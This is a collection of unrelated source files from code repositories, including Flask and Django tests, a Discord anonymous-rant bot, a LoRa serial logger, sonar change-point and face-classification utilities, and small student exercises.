] | permissive | DerKip/Ride-My-Way | 284b62485ca51b88b5e7b6e99e4b759f8f476823 | 30600349b4225272c4b6e78851c1dce96e586d31 | refs/heads/develop | 2022-12-08T21:42:49.298123 | 2018-08-01T07:57:49 | 2018-08-01T07:57:49 | 136,759,664 | 4 | 1 | MIT | 2022-12-08T00:58:59 | 2018-06-09T21:32:37 | Python | UTF-8 | Python | false | false | 5,654 | py | from ..tests.base_test import BaseTestCase
from ..models.models import db, initialize, drop
import json
class RegistrationTestCase(BaseTestCase):
    """Integration tests for the signup endpoint (auth/signup)."""
    def setUp(self):
        """Reset the database and prepare the signup payload fixtures."""
        super().setUp()
        db.__init__()
        drop()
        initialize()
        # Each key is one signup payload exercising a different validation
        # path (see the individual tests below).
        self.data = {
            "user":{
                "username":"Errick",
                "email":"dkip64@gmail.com",
                "contact":"0721611441",
                "password":"TakeMethere1!",
                "confirm_password":"TakeMethere1!"
            },
            # Same email as "user" but a different username -- used to
            # check duplicate-email rejection.
            "user1":{
                "username":"Emannuel",
                "email":"dkip64@gmail.com",
                "contact":"0778161441",
                "password":"Van#dgert3",
                "confirm_password":"Van#dgert3"
            },
            # Whitespace-only username/contact must be rejected.
            "spaces":{
                "username":" ",
                "email":"dkip64@gmail.com",
                "contact":" ",
                "password":"TakeMethere1!",
                "confirm_password":"TakeMethere1!"
            },
            # Missing "contact" field and empty username/email.
            "user2":{
                "username":"",
                "email":"",
                "password":"#derkIp",
                "confirm_password":"#derkIp"
            },
            # password != confirm_password.
            "mismatch":{
                "username":"Jon",
                "email":"Doe",
                "password":"#derkIp",
                "confirm_password":"#dkIp"
            },
            # Password too weak to pass the strength rules.
            "weak":{
                "username":"Jon",
                "email":"Doe",
                "password":"jon",
                "confirm_password":"jon"
            },
            # Email without an "@" must be rejected.
            "invalid_email":{
                "username":"Angelina",
                "email":"Angelinagmail.scom",
                "password":"angelina",
                "confirm_password":"angelina"
            }
        }
    def tearDown(self):
        # Drop all tables so each test starts from a clean database.
        drop()
    def test_user_can_register(self):
        """test whether user can register"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,201)  # 201 Created
    def test_user_cannot_register_twice(self):
        """test whether user cannot register twice"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json') #checks if user can't register with existing user details
        self.assertEqual(res.status_code,409)  # 409 Conflict
    def test_user_cannot_register_with_empty_spaces(self):
        """test whether user a user cannot register with empty spaces in fields"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["spaces"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,400)  # 400 Bad Request
    def test_user_cannot_register_with_missing_fields(self):
        """test whether user a user cannot register with missing fields"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user2"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,400) #bad request
    def test_weak_password(self):
        """test whether a user cannot register with a weak password"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["weak"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,400)
    def test_email(self):
        """test whether a user email is valid"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["invalid_email"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,400)
    def test_password_mismatch(self):
        """test whether confirm password matches with given password """
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["mismatch"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,400)
    def test_user_can_register_without_filling_car_details(self):
        """test whether user a user can register without filling car details which isn't neccessary"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,201)
    def test_user_cannot_register_with_existing_email(self):
        """test whether user a user cannot register with email already in use"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user1"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,409)
    def test_user_cannot_register_with_existing_username(self):
        """test whether user a user cannot register with username already in use"""
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
                    content_type='application/json')
        self.assertEqual(res.status_code,409)
| [
"dkip64@gmail.com"
] | dkip64@gmail.com |
d80dd720858dc042a2f195293139c38d8a080e38 | 50de54517ef5e157b43598e412c477fd66890a3e | /Assignment 05/Problem 04.py | b0883029d93e9bfb1ca023132749cea0e5ea3943 | [] | no_license | Shihabsarker93/BRACU-CSE111 | f530be247bebaaee9cc5e85948dc070adae0c6ae | 17c95c76f84abffe9d9bdcb5861fbacbc510b5a6 | refs/heads/main | 2023-08-13T15:33:57.331850 | 2021-10-07T10:56:09 | 2021-10-07T10:56:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | class Color:
def __init__(self, color):
self.clr = color
def __add__(self, other):
self.clr = self.clr + other.clr
if self.clr == "redyellow" or self.clr == "yellowred":
self.clr = "Orange"
elif self.clr == "redblue" or self.clr == "bluered":
self.clr = "Violet"
elif self.clr == "yellowblue" or self.clr == "blueyellow":
self.clr = "Green"
return Color(self.clr)
# Interactive driver: read two color names, mix them and show the result.
first = Color(input("First Color: ").lower())
second = Color(input("Second Color: ").lower())
mixed = first + second
print("Color formed:", mixed.clr)
| [
"mirzamahrabhossain@gmail.com"
] | mirzamahrabhossain@gmail.com |
922632bd7fd107d2f4b5713afca0a914316f2f55 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/195/48791/submittedfiles/testes.py | 697187f7d52f0e988ed1e5a2cdacc5e64b225503 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | # -*- coding: utf-8 -*-
a=int(input('digite a:'))
b=int(input('digite b:'))
c=int(input('digite c:'))
d=int(input('digite d:'))
if a>b and a>c and a>d:
print(a)
if b>a and b>c and b>d:
print(b)
if c>a and c>b and c>d:
print(c)
if d>a and d>b and d>c:
print(d)
if a<b and a<c and a<d:
print(a)
if b<a and b<c and b<d:
print(b)
if c<a and c<b and c<d:
print(c)
if d<a and d<b and d<c:
print(d) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
fa883276bba7a3b272be39a5bccc3a913013632e | 41a4a42fa875939d1d80195bb3fcdb167520a2ae | /company/test_forms.py | f665134d9ceed1c260a0e405543c75134e032644 | [] | no_license | hfolcot/issue-tracker | f05de6919835cb38abe83095933652bcce6cfac1 | 14f25b5346f0a9d28010d6f23b44f0e26666ed58 | refs/heads/master | 2022-12-26T03:16:21.607129 | 2021-05-27T13:38:48 | 2021-05-27T13:38:48 | 167,358,769 | 0 | 1 | null | 2022-12-08T03:12:32 | 2019-01-24T11:46:00 | Python | UTF-8 | Python | false | false | 895 | py | from django.test import TestCase
from . import forms
class TestContactForm(TestCase):
    """Validation tests for ContactForm.

    Bug fix: the original tests called ``assertTrue(x, msg)`` with the
    expected error list passed as the *msg* argument, so they only checked
    that a (always truthy, or KeyError-raising) errors entry existed and
    never compared the messages.  They now assert the real validation
    outcome.
    """

    def test_form_is_not_valid_without_all_fields_entered(self):
        form = forms.ContactForm({'your_name': '', 'email': '',
                                  'message': ''})
        self.assertFalse(form.is_valid())
        self.assertEqual(form.errors['your_name'], [u'This field is required.'])
        self.assertEqual(form.errors['email'], [u'This field is required.'])
        self.assertEqual(form.errors['message'], [u'This field is required.'])

    def test_email_field_is_validated(self):
        form = forms.ContactForm({'your_name': 'test', 'email': 'notanemail',
                                  'message': 'test'})
        self.assertFalse(form.is_valid())
        # The original expected a browser-generated message; the exact
        # wording varies by Django version, so only assert the field failed.
        self.assertIn('email', form.errors)

    def test_form_is_valid_with_all_fields_entered(self):
        form = forms.ContactForm({'your_name': 'test', 'email': 'test@test.test',
                                  'message': 'test'})
        self.assertTrue(form.is_valid())
"hfolcot@gmail.com"
] | hfolcot@gmail.com |
1dce939f95f133209f32569b9e8b6b0702554575 | f5d1e8b54ddbc51a9ef1b868eee93096d9b0fbeb | /weapp/termite2/activate_wepage_mechanism.py | 241e34812fed2fa1777746f08e55f3f0616b0d9e | [] | no_license | chengdg/weizoom | 97740c121724fae582b10cdbe0ce227a1f065ece | 8b2f7befe92841bcc35e0e60cac5958ef3f3af54 | refs/heads/master | 2021-01-22T20:29:30.297059 | 2017-03-30T08:39:25 | 2017-03-30T08:39:25 | 85,268,003 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # -*- coding: utf-8 -*-
import json
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.db.models import F
from django.contrib.auth.decorators import login_required
from account import models as account_models
from core import resource
from core.jsonresponse import create_response
from webapp import models as webapp_models
class ActivateWepageMechanism(resource.Resource):
    # Routing identifiers used by the resource framework's dispatcher.
    app = 'termite2'
    resource = 'activate_wepage_mechanism'

    @login_required
    def api_put(request):
        """
        Activate the wepage mechanism for the current user's account.

        NOTE(review): defined without ``self`` -- presumably the resource
        framework dispatches this as an unbound handler; confirm.
        """
        # Flip the is_use_wepage flag on the caller's profile row.
        account_models.UserProfile.objects.filter(user_id=request.user.id).update(is_use_wepage=True)
        response = create_response(200)
        return response.get_response()
| [
"gaoliqi@weizoom.com"
] | gaoliqi@weizoom.com |
6366520696258a461f3115d86f78471be03fe8ae | 7c3a2a44536779d711349f38a18c0edd95ff5b1f | /algolia_places/__init__.py | 7b9dcb29453e2ba317b160934479cabb2fbb81ee | [
"MIT"
] | permissive | m-vdb/algolia-places-python | f0c566d5801a9397406cce32bbc8593da85cf769 | 84fcbf93abf35ad4c42ade0415fdafa2674639f7 | refs/heads/master | 2021-07-11T13:38:00.898814 | 2018-08-20T12:54:11 | 2018-08-20T12:54:11 | 145,402,115 | 2 | 1 | MIT | 2020-06-16T07:53:03 | 2018-08-20T10:20:15 | Python | UTF-8 | Python | false | false | 69 | py | """Algolia places module."""
from .client import AlgoliaPlacesClient
| [
"mvergerdelbove@work4labs.com"
] | mvergerdelbove@work4labs.com |
d12c93622232f347d20dbadc382905388fd5a03c | e9354fa4fda49b91509695f9237a873885199691 | /Main/migrations/0006_mask_likes.py | 398006c63d9cc301c31c8befe836d38a0e149eef | [] | no_license | DreamTeamInc/Core-backend | ccb89a66a0abe4ede1a6623441a26865e9a1f539 | 63801d1de0b39f678b7cb37514730c8203b227c2 | refs/heads/master | 2023-01-13T23:51:25.302887 | 2020-11-26T18:05:33 | 2020-11-26T18:05:33 | 299,843,151 | 0 | 0 | null | 2020-11-21T06:49:48 | 2020-09-30T07:34:03 | Python | UTF-8 | Python | false | false | 426 | py | # Generated by Django 3.1.2 on 2020-10-22 12:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Main', '0005_auto_20201019_1918'),
]
operations = [
migrations.AddField(
model_name='mask',
name='likes',
field=models.PositiveSmallIntegerField(default=0),
preserve_default=False,
),
]
| [
"4eckah78"
] | 4eckah78 |
0f80f690d3b8d2483d815eb3d69a1cac19cee35e | e7a6d5073b6ab13c33148033053e8a6e8a67d36d | /linux/kernel/interogate_smaps.py | f422248fcdeea601b6144f448a913f2628635083 | [
"Apache-2.0"
] | permissive | Oneiroi/sysadmin | 39de72a5d788070219e8dc171e0cba27334c2fa1 | 23429993c61be124ce445f219f835ce3659d99ee | refs/heads/master | 2023-03-21T18:34:50.716777 | 2023-03-07T16:56:39 | 2023-03-07T16:56:39 | 1,074,593 | 31 | 18 | null | 2018-04-16T09:49:50 | 2010-11-12T13:13:25 | Python | UTF-8 | Python | false | false | 500 | py | #!/usr/bin/env python
import glob
def main():
    """Print a header row for per-process smaps metrics and collect the
    per-process smaps file paths.

    NOTE(review): Python 2 code (xrange, print statement).  The ``smaps``
    list is collected but never used -- the per-process parsing/printing
    appears unfinished (TODO).
    """
    # Row template: one 10-wide column for the process, then 13 columns
    # 15 characters wide for the smaps fields.
    template = '{0:10}'
    for i in xrange(1,14):
        template += '{%d:15}' %i
    print template.format(
        'Process',
        'Size',
        'Rss',
        'Pss',
        'Shared_Clean',
        'Shared_Dirty',
        'Private_Clean',
        'Private_Dirty',
        'Referenced',
        'Anonymous',
        'AnonHugePages',
        'Swap',
        'KernelPageSize',
        'MMUPageSize')
    # All numeric-PID processes' smaps files (unused so far -- see note).
    smaps = glob.glob('/proc/[0-9]*/smaps')
# Script entry point.
if __name__ == '__main__':
    main()
| [
"oneiroi@fedoraproject.org"
] | oneiroi@fedoraproject.org |
ecfd2884da65ec11224cd11006ffbfd7b1f9157c | b375432011b9abe6bd60a6dd7bd538f7044d9f59 | /LoRa Python Files/Node 1/RX_Logging_Code (00224D6A3DEB's conflicted copy 2019-03-28).py | ecf247064170c364f72683a32647a7770217ccba | [] | no_license | opus-meum/MSc-Project | bffc964aa1258fbac486283f3579f18b0fb2dad7 | dd9fadfd5e1980a56a3370e13b3d4da26feb6108 | refs/heads/master | 2022-01-10T03:33:48.746858 | 2019-06-27T14:20:43 | 2019-06-27T14:20:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | """"
Experiment Test: RX Logger Code
Node 1
By Kossivi Fangbemi
"""
import time
import serial
serial_com4 = serial.Serial("COM11", 9600, timeout= 0.30)
try:
Text_File = open('RX_Logger_File', 'a')
"""Text_File.write('Nth Data sent \t || \t TX Power dBm \t || \t Acknowledgment \t || \t RSSI dBm \t\t || \t SRN || \n\r')
"""
print('RX_Logger_File opened')
except Exception, e1:
print 'Error in openning TX_Logger_File' + str(e1)
exit()
try:
serial_com4.open
except Exception, e:
print 'Error in openning Serial Port' + str(e)
exit()
if serial_com4.isOpen():
try:
serial_com4.flushInput()
serial_com4.flushOutput()
time.sleep(0.001)
while True:
Text_File = open('RX_Logger_File', 'a')
Response = serial_com4.read(150)
if Response != '':
print(Response)
Text_File.write(Response)
time.sleep(0.002)
Text_File.close()
#serial_com5.flushInput()
#serial_com5.flushOutput()
#break
serial_com4.close()
Text_File.close()
except Exception, ee:
print("Serial Communication Error: " + str(ee))
else:
print("<<<-- Serial Port Com Not Opened -->>>")
| [
"kossiviagbe@gmail.com"
] | kossiviagbe@gmail.com |
5304fa765d4927fd4cefa8bd7af24bd149b98a00 | e9c882a52ba0e5ee250a1e42cbc79d68b919213a | /comparingExcel.py | 02ab5dfc9381455fb1a8de328b4a0214d2a3465d | [] | no_license | malikatahseen/swmsed | 438015c61bff16e73b06fec0c6a837b9bf52848b | 8a2aaee46594b632242c269fffd2f6095d8c2a78 | refs/heads/main | 2023-08-24T20:13:10.267463 | 2021-09-16T08:51:24 | 2021-09-16T08:51:24 | 407,089,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import pandas as pd
from pandas import ExcelWriter
df = pd.read_excel(r'C:\Users\MALIKA\Desktop\mapping file.xlsx')
result = df[df['Prod.ERP.Name'].isin(list(df['STATUS'])) & df['Prod.GOV.Name'].isin(list(df['STATUS']))]
print(result)
writer = ExcelWriter('result.xlsx')
result.to_excel(writer,'Sheet1',index=False)
writer.save() | [
"noreply@github.com"
] | noreply@github.com |
c5b7c0831380a9b4fd9effc5cea7908430770144 | 92f6ffb240a1fbaa52ae23f614663b2b915e4187 | /backend/home/migrations/0002_load_initial_data.py | 79e2423fce37abb55ff579976a85fe906d1c2f41 | [] | no_license | crowdbotics-apps/msgs-sghsg56-dev-12782 | 3b196351f5ff932916802912c7740c7455a78459 | 10f95c9e897dcad50e21950879adc97b9fe689f4 | refs/heads/master | 2022-12-24T00:35:35.056481 | 2020-10-06T09:11:48 | 2020-10-06T09:11:48 | 301,672,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "MSGS-sghsg56"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">MSGS-sghsg56</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "msgs-sghsg56-dev-12782.botics.co"
site_params = {
"name": "MSGS-sghsg56",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
41d57f34fb18db0a6f660a6cf4b40fb9024e33f3 | f78572ce42d800147396308943e346d32c011601 | /sss_object_detection/src/sss_object_detection/cpd_detector.py | efef436d1f39f36e35a4edb04395e075f6082aac | [
"BSD-3-Clause"
] | permissive | ShounakCy/smarc_perception | 83f579bb4fe1aa4b6b19f261f8f547ec81d4c2dd | 37de967be6246dbfd588608d7cbf77112c785ed3 | refs/heads/noetic-devel | 2023-08-18T19:41:46.019355 | 2021-10-14T12:15:21 | 2021-10-14T12:15:21 | 408,851,791 | 0 | 0 | BSD-3-Clause | 2021-09-21T14:25:51 | 2021-09-21T14:25:48 | null | UTF-8 | Python | false | false | 4,321 | py | import numpy as np
import ruptures as rpt
from sss_object_detection.consts import ObjectID
class CPDetector:
"""Change point detector using window sliding for segmentation"""
def __init__(self):
self.buoy_width = 15
self.min_mean_diff_ratio = 1.5
def detect(self, ping):
"""Detection returns a dictionary with key being ObjectID and
value being a dictionary of position and confidence of the
detection."""
detections = {}
nadir_idx = self._detect_nadir(ping)
# rope = self._detect_rope(ping, nadir_idx)
buoy = self._detect_buoy(ping, nadir_idx)
# detections[ObjectID.NADIR] = {'pos': nadir_idx, 'confidence': .9}
# if rope:
# detections[ObjectID.ROPE] = {
# 'pos': rope[0][0],
# 'confidence': rope[1]
# }
if buoy:
detections[ObjectID.BUOY] = {
'pos': buoy[0][0],
'confidence': buoy[1]
}
return detections
def _compare_region_with_surrounding(self, ping, bkps, window_size=50):
region_mean = np.mean(ping[bkps[0]:bkps[1]])
prev_window = ping[max(bkps[0] - window_size, 0):bkps[0]]
post_window = ping[bkps[1] + 1:min(bkps[1] +
window_size, ping.shape[0])]
surrounding_mean = (np.mean(prev_window) + np.mean(post_window)) / 2
return region_mean / surrounding_mean
def _detect_rope(self, ping, nadir_idx):
"""Given the tentative nadir_annotation, provide tentative rope
annotation by segmenting the nadir region. Return None if the
break point detected is unlikely to be a rope."""
bkps = self._window_sliding_segmentation(ping=ping,
start_idx=40,
end_idx=nadir_idx,
width=4,
n_bkps=1)
bkps = [bkps[0] - 1, bkps[0] + 1]
mean_diff_ratio = self._compare_region_with_surrounding(ping, bkps)
if mean_diff_ratio < self.min_mean_diff_ratio:
return None
confidence = 1 / mean_diff_ratio
return bkps, confidence
def _detect_buoy(self, ping, nadir_idx):
"""Given the tentative nadir_annotation, provide tentative buoy
detection by segmenting the nadir region. Return None if no
buoy detected."""
bkps = self._window_sliding_segmentation(ping=ping,
start_idx=40,
end_idx=nadir_idx,
width=self.buoy_width,
n_bkps=2)
# Check whether the segmentation is likely to be a buoy
if bkps[1] - bkps[0] > self.buoy_width * 2 or bkps[1] - bkps[
0] < self.buoy_width * .5:
return None
mean_diff_ratio = self._compare_region_with_surrounding(ping, bkps)
if mean_diff_ratio < self.min_mean_diff_ratio:
return None
confidence = 1 / mean_diff_ratio
return bkps, confidence
def _detect_nadir(self, ping):
"""Use window sliding segmentation to provide tentative
nadir location annotation. Return detected nadir index."""
bkps = self._window_sliding_segmentation(ping=ping,
n_bkps=1,
start_idx=100,
end_idx=ping.shape[0],
width=100)
return bkps[0]
def _window_sliding_segmentation(self, ping, n_bkps, start_idx, end_idx,
width):
"""Use window sliding method to segment the input numpy array from
start_idx to end_idx into (n_bkps + 1) segments. Return a list of
suggested break points."""
algo = rpt.Window(width=width, model='l2').fit(ping[start_idx:end_idx])
bkps = algo.predict(n_bkps=n_bkps)
bkps = [bkps[i] + start_idx for i in range(len(bkps))]
return bkps
| [
"liling@kth.se"
] | liling@kth.se |
ee455120d07d20db9d326555a538e8ddbf8ba9e1 | 9cd882ab23d9332fc8eef3ae0ce54d786bf73546 | /Anonymous(Alpha).py | cb8f8a756316fcc41d2c32b29d1704b11fefd8a8 | [] | no_license | KennethL27/Anonymous_Bots | 67e6ddd81bfb6df0461a21011b76062f9e02db63 | 4566e55222df0f09ed2497bb5faf0a3939351494 | refs/heads/master | 2023-03-05T15:43:07.068561 | 2021-02-23T19:46:41 | 2021-02-23T19:46:41 | 341,039,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,044 | py | import discord, time
from discord.ext import commands
intents = discord.Intents.default()
intents.guilds = True
intents.members = True
intents.messages = True
client = commands.Bot(command_prefix = '-', intents = intents)
rant_channel_id = 718972914434572402
guild_id = 613512375798333450
gaucho_id = 761355746163163138
@client.event
async def on_ready():
print('Bot is ready')
# User Commands
######################################################################################################################################################
@client.command(aliases=['whine','r','complaint'])
async def rant(ctx,*,rant):
print(f'User: {ctx.author} said: {rant}')
await ctx.channel.purge(limit=1)
await ctx.send(rant)
@client.command()
async def uptime(ctx):
time_seconds = time.perf_counter()
time_days = time_seconds //(86400)
time_seconds = time_seconds % 86400
time_hours = time_seconds // 3600
time_seconds %= 3600
time_minutes = time_seconds // 60
time_seconds %= 60
time_seconds = time_seconds
await ctx.send(f'**UPTIME**: Days: {int(time_days)}, Hours: {int(time_hours)}, Minutes: {int(time_minutes)}, Seconds: {round(time_seconds,2)}')
# DM Feature
######################################################################################################################################################
@client.listen('on_message')
async def on_message(message):
guild = client.get_guild(guild_id)
user_id = message.author.id
usable_member = guild.get_member(user_id)
gaucho_role = guild.get_role(gaucho_id)
usable_member_roles = usable_member.roles
if gaucho_role in usable_member_roles:
if message.channel != client.get_channel(rant_channel_id):
if message.author != client.user:
rant2 = str(message.content)
channel = client.get_channel(rant_channel_id)
print(f'User: {message.author} said: {rant2}')
await channel.send(content = rant2)
client.run('TOKEN') | [
"kenneth.lara01@gmail.com"
] | kenneth.lara01@gmail.com |
22682de8e09ae6b405ad831230b9747b3f8f61ff | a2a99d7b7f82cf1d8ea521682e1b784e94229dca | /mysite/urls.py | e2ed5368aa208170ffb09985edea26d4bd3df57c | [] | no_license | marianjoroge/polls | f96324b17e6e57ac54c9cb21203741b8ef4eb838 | c86194d1e2cac209e554fde4300a1919ab8efa5e | refs/heads/master | 2020-05-26T00:21:06.143018 | 2019-05-22T14:15:17 | 2019-05-22T14:15:17 | 188,050,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^polls/', include('polls.urls')),
url(r'^admin/', admin.site.urls),
url(r'^api/polls', include('polls.api.urls', namespace='api-polls')),
]
| [
"njorogemaria8@gmail.com"
] | njorogemaria8@gmail.com |
62b59c59255156c3b496e9918e56c9b184e0694c | 60abe94f54c64235bed696143fa77acc65c57e51 | /home/urls.py | 7ce0818898e61395aaf5a6b60c7e17c5a8ba1691 | [] | no_license | ncepu-liudong/AXF | 782a752c34d57949c930a5da55c8cd7f5d9a7c6c | 6f3c9cc02928a1d597bf3dcc3b6686815b7dcadf | refs/heads/master | 2022-12-08T13:27:05.796584 | 2020-09-01T12:49:09 | 2020-09-01T12:49:09 | 284,428,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from django.contrib import admin
from django.urls import path, include
from rest_framework.documentation import include_docs_urls
from home import views
app_name = 'home'
urlpatterns = [
path('home/', views.HomeListView.as_view(), name='home'),
] | [
"46965739+ncepu-liudong@users.noreply.github.com"
] | 46965739+ncepu-liudong@users.noreply.github.com |
e9e6013d45c4fcc42b1c9ff3d15d058a13493e6b | 5d8b4f98459c0083b407ab7947e99effe8c2e8d6 | /WorldLeaderClassifier/server/util.py | 7e7a2cd39daa570db4de263c6f113d5c841eb138 | [] | no_license | udayashangar/DataScienceProjects | cdb9959be059653c09e4f8b7be7af93b0fc89f71 | bae18d9edf9d7717fa6397971bc129759f29c7fa | refs/heads/master | 2022-12-04T03:04:22.956357 | 2020-08-21T05:41:04 | 2020-08-21T05:41:04 | 286,650,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,957 | py | import joblib
import json
import numpy as np
import base64
import cv2
import pywt
__class_name_to_number = {}
__class_number_to_name = {}
__model = None
def w2d(img, mode='haar', level=1):
imArray = img
#Datatype conversions
#convert to grayscale
imArray = cv2.cvtColor( imArray,cv2.COLOR_RGB2GRAY )
#convert to float
imArray = np.float32(imArray)
imArray /= 255;
# compute coefficients
coeffs=pywt.wavedec2(imArray, mode, level=level)
#Process Coefficients
coeffs_H=list(coeffs)
coeffs_H[0] *= 0;
# reconstruction
imArray_H=pywt.waverec2(coeffs_H, mode);
imArray_H *= 255;
imArray_H = np.uint8(imArray_H)
return imArray_H
def classify_image(image_base64_data, file_path=None):
imgs = get_cropped_image_if_2_eyes(file_path, image_base64_data)
result = []
for img in imgs:
scalled_raw_img = cv2.resize(img, (32, 32))
img_har = w2d(img, 'db1', 5)
scalled_img_har = cv2.resize(img_har, (32, 32))
combined_img = np.vstack((scalled_raw_img.reshape(32 * 32 * 3, 1), scalled_img_har.reshape(32 * 32, 1)))
len_image_array = 32*32*3 + 32*32
final = combined_img.reshape(1,len_image_array).astype(float)
result.append({
'class': class_number_to_name(__model.predict(final)[0]),
'class_probability': np.around(__model.predict_proba(final)*100,2).tolist()[0],
'class_dictionary': __class_name_to_number
})
return result
def class_number_to_name(class_num):
return __class_number_to_name[class_num]
def load_saved_artifacts():
print("loading saved artifacts...start")
global __class_name_to_number
global __class_number_to_name
with open("./artifacts/class_dictionary.json", "r") as f:
__class_name_to_number = json.load(f)
__class_number_to_name = {v:k for k,v in __class_name_to_number.items()}
global __model
if __model is None:
with open('./artifacts/saved_model.pkl', 'rb') as f:
__model = joblib.load(f)
print("loading saved artifacts...done")
def get_cv2_image_from_base64_string(b64str):
'''
credit: https://stackoverflow.com/questions/33754935/read-a-base-64-encoded-image-from-memory-using-opencv-python-library
:param uri:
:return:
'''
encoded_data = b64str.split(',')[1]
nparr = np.frombuffer(base64.b64decode(encoded_data), np.uint8)
img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
return img
def get_cropped_image_if_2_eyes(image_path, image_base64_data):
face_cascade = cv2.CascadeClassifier('./opencv/haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('./opencv/haarcascades/haarcascade_eye.xml')
if image_path:
img = cv2.imread(image_path)
else:
img = get_cv2_image_from_base64_string(image_base64_data)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
cropped_faces = []
for (x,y,w,h) in faces:
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
if len(eyes) >= 2:
cropped_faces.append(roi_color)
return cropped_faces
def get_b64_test_image_for_modi():
with open("b64.txt") as f:
return f.read()
if __name__ == '__main__':
load_saved_artifacts()
#print(classify_image(get_b64_test_image_for_modi(), None))
print(classify_image(None, "./test_images/DT1.jpg"))
print(classify_image(None, "./test_images/DT2.jpg"))
print(classify_image(None, "./test_images/NM1.jpg"))
print(classify_image(None, "./test_images/NM2.jpg"))
print(classify_image(None, "./test_images/VP1.jpeg"))
print(classify_image(None, "./test_images/VP2.jpeg"))
print(classify_image(None, "./test_images/VP3.jpeg"))
print(classify_image(None, "./test_images/VP4.jpg"))
| [
"udayashangar@gmail.com"
] | udayashangar@gmail.com |
bf1f4be617b6f1f98baea223f73aa9d4cf33687a | 7f324af4359ae41a00391b726d169682ef91f2e7 | /Simulations/EnsemblePursuitSimulations.py | 5dd81bfd8eaeb9a19377113a17514a610b71720b | [] | no_license | MouseLand/kesa-et-al-2019 | e5b7acf7301036a7e2e7c332223cea6ceb50d7db | 6c9752cfd5679451fae10199a451b1939f6681e3 | refs/heads/master | 2020-08-05T03:27:25.091375 | 2019-11-06T00:24:26 | 2019-11-06T00:24:26 | 212,375,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,471 | py | import torch
import numpy as np
class EnsemblePursuitPyTorch():
def __init__(self, n_ensembles, lambd, options_dict):
self.n_ensembles=n_ensembles
self.lambd=lambd
self.options_dict=options_dict
def zscore(self,X):
#Have to transpose X to make torch.sub and div work. Transpose back into
#original shape when done with calculations.
mean_stimuli=X.t().mean(dim=0)
std_stimuli=X.t().std(dim=0)+1e-10
